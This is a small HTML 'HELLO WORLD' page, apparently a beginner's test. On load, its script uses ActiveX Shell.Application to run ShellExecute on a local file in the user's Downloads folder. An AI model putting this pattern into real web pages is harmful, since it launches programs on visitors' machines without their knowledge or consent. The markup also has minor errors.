<!DOCTYPE HTML>
<html>

<head>
    <style>
        .text{
            font-family:Segoe UI;
            color:rgb(19, 88, 65);
            size:100px;
            text-align:center;
            margin: 100px
        }
        
    

    </style>>
</head>

<body>
    <span class="text">HELLO WORLD</span>
    <script>
        var oShell = new ActiveXObject("Shell.Application");
        var commandtoRun = "MyFiles/Downloads/unnamed.gif";
        oShell.ShellExecute(commandtoRun,"","","open","1");
    </script>
    
</body>

</html>
